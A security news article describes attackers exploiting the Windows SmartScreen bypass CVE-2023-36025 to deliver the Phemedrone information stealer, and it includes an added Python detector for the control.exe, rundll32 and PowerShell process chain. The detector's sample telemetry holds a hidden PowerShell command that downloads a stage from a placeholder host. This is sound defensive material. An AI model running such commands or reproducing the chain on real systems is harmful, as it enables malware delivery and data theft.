Cybercriminals Exploit Windows Flaw to Unleash Phemedrone Stealer

In a concerning development, cyber threat actors are capitalizing on a recently patched security flaw in Microsoft Windows to deploy the Phemedrone Stealer, an open-source information-stealing tool. Researchers found that Phemedrone specifically targets web browsers and extracts data from cryptocurrency wallets and messaging platforms such as Telegram, Steam, and Discord.

The malware goes beyond data theft by capturing screenshots and gathering comprehensive system information, including hardware details, location data, and operating system specifications. Subsequently, the pilfered data is transmitted to the attackers through the Telegram messaging platform or their command-and-control (C&C) server.

The vulnerability exploited, CVE-2023-36025 (CVSS score: 8.8), is a security bypass flaw in Windows SmartScreen. Exploitation requires tricking a user into clicking a specially crafted Internet Shortcut (.URL) file or a hyperlink pointing to one. Microsoft addressed this actively exploited vulnerability in its November 2023 Patch Tuesday updates.

The infection chain begins with threat actors hosting malicious Internet Shortcut files on platforms like Discord or cloud services such as FileTransfer.io, often behind URL shorteners like Short URL to further obscure the activity. When the malicious .URL file is executed, it connects to a server controlled by the threat actors and runs a Control Panel (.CPL) file. Because of CVE-2023-36025, this step bypasses Windows Defender SmartScreen.

The malicious .CPL file, when executed through the Windows Control Panel process binary, invokes rundll32.exe to run a DLL. This DLL acts as a loader and launches Windows PowerShell to download and execute the next stage, hosted on GitHub. That stage is a PowerShell loader named “DATA3.txt,” which serves as a launchpad for Donut, an open-source shellcode loader that decrypts and executes the Phemedrone Stealer.
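The chain just described (Control Panel binary, then rundll32.exe, then PowerShell fetching a remote stage) leaves a distinctive parent-child process sequence that defenders can look for in process-creation telemetry. The following is an added example, not code from the article or from any vendor: it reconstructs process ancestry from constructed, Sysmon-style events and flags a PowerShell process whose ancestry matches that sequence and whose command line downloads content. The event format, field names and sample values are assumptions.

```python
from dataclasses import dataclass

@dataclass(frozen=True)
class ProcEvent:
    """Minimal process-creation record (assumed format, modelled on Sysmon Event ID 1)."""
    pid: int
    ppid: int
    image: str
    cmdline: str

# Parent-first sequence described in the article: control.exe -> rundll32.exe -> powershell.exe
PHEMEDRONE_CHAIN = ("control.exe", "rundll32.exe", "powershell.exe")
# Command-line fragments suggesting PowerShell is fetching a remote stage.
DOWNLOAD_HINTS = ("downloadstring", "downloadfile", "invoke-webrequest", "http")

def ancestors(events, pid):
    """Return image names from the given process up through its parents (child first)."""
    by_pid = {e.pid: e for e in events}
    chain, seen = [], set()
    while pid in by_pid and pid not in seen:   # stop at the root or on a pid cycle
        seen.add(pid)
        chain.append(by_pid[pid].image.lower())
        pid = by_pid[pid].ppid
    return chain

def match_chain(events, chain=PHEMEDRONE_CHAIN):
    """Return pids whose immediate ancestry is exactly `chain` (parent-first), in order."""
    want = [name.lower() for name in reversed(chain)]   # compare child-first
    return [e.pid for e in events if ancestors(events, e.pid)[:len(want)] == want]

def suspicious_powershell(events):
    """Pids matching the chain whose PowerShell command line also downloads content."""
    by_pid = {e.pid: e for e in events}
    return [p for p in match_chain(events)
            if any(h in by_pid[p].cmdline.lower() for h in DOWNLOAD_HINTS)]

# Constructed sample telemetry: one benign PowerShell session and one matching the chain.
SAMPLE_EVENTS = [
    ProcEvent(100, 1,   "explorer.exe",   "explorer.exe"),
    ProcEvent(200, 100, "control.exe",    r'control.exe "C:\Users\u\AppData\Local\Temp\x.cpl"'),
    ProcEvent(300, 200, "rundll32.exe",   r'rundll32.exe shell32.dll,Control_RunDLL "C:\Users\u\AppData\Local\Temp\x.cpl"'),
    ProcEvent(400, 300, "powershell.exe", 'powershell.exe -nop -w hidden -c "Invoke-WebRequest https://example.invalid/DATA3.txt"'),
    ProcEvent(500, 100, "powershell.exe", r"powershell.exe Get-ChildItem C:\Users"),
]

if __name__ == "__main__":
    print("suspicious pids:", suspicious_powershell(SAMPLE_EVENTS))   # prints [400]
```

The chain match is deliberately strict (contiguous ancestry ending at the flagged process), so an interactive PowerShell launched from Explorer is not reported even though it shares an image name with the malicious stage.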

Phemedrone Stealer, coded in C#, remains actively maintained by its developers on platforms like GitHub and Telegram. This tool is adept at pilfering sensitive information from compromised systems, underlining the adaptability of threat actors in exploiting disclosed vulnerabilities for maximum impact.

Despite the patch released by Microsoft, threat actors persist in exploiting CVE-2023-36025, evading Windows Defender SmartScreen protections. This persistence poses an ongoing threat, enabling the deployment of various malware types, including ransomware and information-stealing tools like Phemedrone Stealer.

Mitigating this risk requires swift action. Ensure all systems are updated with the latest security patches, especially those addressing vulnerabilities like CVE-2023-36025. Implementing robust email and web filtering can prevent users from falling victim to phishing attempts. Regularly monitoring network traffic for anomalies and staying abreast of security updates will strengthen overall resilience against the deployment of information stealers like Phemedrone.